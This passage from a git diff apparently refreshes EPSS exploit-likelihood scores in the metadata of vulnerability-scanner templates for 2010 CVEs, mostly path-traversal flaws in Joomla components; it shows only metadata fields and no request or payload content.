CVE-2010-1478 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index aa13c6c524..859dbac44f 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1491 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73076 + epss-percentile: 0.73105 cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 10b7478c69..4c237d2820 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5 cve-id: CVE-2010-1494 cwe-id: CWE-22 - epss-score: 0.02305 - epss-percentile: 0.88502 + epss-score: 0.01827 + epss-percentile: 0.86897 cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 43ab8843ac..081672816d 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1495 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.9153 + epss-percentile: 0.91539 cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index cc0c9ec9fb..ddc0088791 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1531 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.8684 + epss-percentile: 0.86842 cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 7b0e30f25b..ae763db5c1 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1532 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73076 + epss-percentile: 0.73105 cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index e06e1d5dd5..e37923e8dc 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1533 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78213 + epss-percentile: 0.78226 cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 9133e98670..3db5585924 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1534 cwe-id: CWE-22 epss-score: 0.01733 - epss-percentile: 0.86481 + epss-percentile: 0.86484 cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index fb5e8b1354..3e516a127a 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1535 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78213 + epss-percentile: 0.78226 cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 3a9b7dd192..ed5dee3f16 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1540 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72298 + epss-percentile: 0.72322 cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index be29917f1a..85d91f8d68 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1586 cwe-id: CWE-20 epss-score: 0.00917 - epss-percentile: 0.81133 + epss-percentile: 0.81145 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index d582ac0051..a3dff32124 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.01299 - epss-percentile: 0.8439 + epss-percentile: 0.84398 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 70827959f7..84e902f139 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1602 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.90416 + epss-percentile: 0.90423 cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index dd8f005269..cb22425096 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1603 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.90416 + epss-percentile: 0.90423 cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 2db7d132de..09bce378ea 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1607 cwe-id: CWE-22 epss-score: 0.01726 - epss-percentile: 0.86458 + epss-percentile: 0.86462 cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 036e7beb5b..44386e278f 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1653 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90505 + epss-percentile: 0.90512 cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index e66fee03a8..d2bb0f8837 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1657 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.8657 + epss-percentile: 0.86574 cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index 0278a114a2..f8dab7b5ab 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1658 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.8657 + epss-percentile: 0.86574 cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 0af9229322..40e0d7fa55 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1659 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86811 + epss-percentile: 0.86814 cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index d5d040a983..a65e9658bb 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1714 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.8657 + epss-percentile: 0.86574 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 2e83abfc16..1c8185e5e3 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83977 + epss-percentile: 0.83986 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index ea891a4754..b46f948c16 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1717 cwe-id: CWE-22 epss-score: 0.01733 - epss-percentile: 0.86481 + epss-percentile: 0.86485 cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index ea35acf700..c317d5d83d 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index cc630ca09b..a61f45d16f 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1719 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.8625 + epss-percentile: 0.86255 cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index fc6ff4d055..0430ec3d01 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1722 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83977 + epss-percentile: 0.83986 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 943ad7594e..d87f5bbb1f 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1723 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87408 + epss-percentile: 0.87415 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 8fbe72e42b..64d60e6ada 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1858 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83288 + epss-percentile: 0.83297 cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 41cac88aff..af3dfe6638 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1870 cwe-id: CWE-917 epss-score: 0.05379 - epss-percentile: 0.92275 + epss-percentile: 0.92283 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index f8bf0b6495..e8733a0a73 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83814 + epss-percentile: 0.83822 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index e7f216cf2c..89ac650d49 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1878 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index e6ee8a9127..9d92311f55 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1952 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83977 + epss-percentile: 0.83986 cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index ea27b6b248..9b37f437ea 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1953 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92484 + epss-percentile: 0.9249 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 000d29475b..7b8b185bf5 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1954 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92484 + epss-percentile: 0.9249 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index f0e409cb3c..e7d2da299f 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1955 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.8625 + epss-percentile: 0.86255 cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index e13ff23922..3472a2d27d 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1956 cwe-id: CWE-22 epss-score: 0.06055 - epss-percentile: 0.92681 + epss-percentile: 0.92687 cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index e37a67b36a..2f75eff98d 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1957 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.8625 + epss-percentile: 0.86255 cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 43c3141b29..ec8b91290e 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1977 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index c4bc044122..8e88d2d7fc 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1979 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 305675119f..b1a8a028d6 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1980 cwe-id: CWE-22 epss-score: 0.02401 - epss-percentile: 0.88715 + epss-percentile: 0.8872 cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 8c93dcf872..874852f247 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1981 cwe-id: CWE-22 epss-score: 0.00656 - epss-percentile: 0.77206 + epss-percentile: 0.77228 cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index b53ea4d89b..aafcdb248d 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1982 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73076 + epss-percentile: 0.73105 cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index f9be147301..26951bc845 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1983 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.8684 + epss-percentile: 0.86842 cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index b868a87d8a..2494a736ec 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-2033 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index d1694ec8f9..4ab9ff5c03 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2034 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78407 + epss-percentile: 0.78419 cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index ef0b3fd7f0..d6e560c201 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2035 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78407 + epss-percentile: 0.78419 cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index fceec8ffc6..29a086ba8a 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2036 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78407 + epss-percentile: 0.78419 cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index b261037344..0b8d4a728f 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2037 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78407 + epss-percentile: 0.78419 cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index c33db7d96b..eceb2717a8 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2045 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.8625 + epss-percentile: 0.86255 cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index aa0750b67c..3d9589a60a 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2050 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90505 + epss-percentile: 0.90512 cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index bc879074b7..868c5cc194 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2122 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86811 + epss-percentile: 0.86814 cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index e418e49bd9..c4427085b3 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2128 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83977 + epss-percentile: 0.83986 cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index e0b09bd89e..d5c4a23f8e 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2259 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.8625 + epss-percentile: 0.86255 cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 928eb68392..ebe0676c1b 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2307 cwe-id: CWE-22 epss-score: 0.00832 - epss-percentile: 0.80125 + epss-percentile: 0.80139 cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 431fda226e..b9d074b3db 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2507 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.8625 + epss-percentile: 0.86255 cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 2a6363fb3a..843887872d 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2680 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index c9c63d1490..04b26592a8 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2682 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 80e10601e5..fdc56faeb7 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2857 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 0fd722fcda..a7861fa47b 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2918 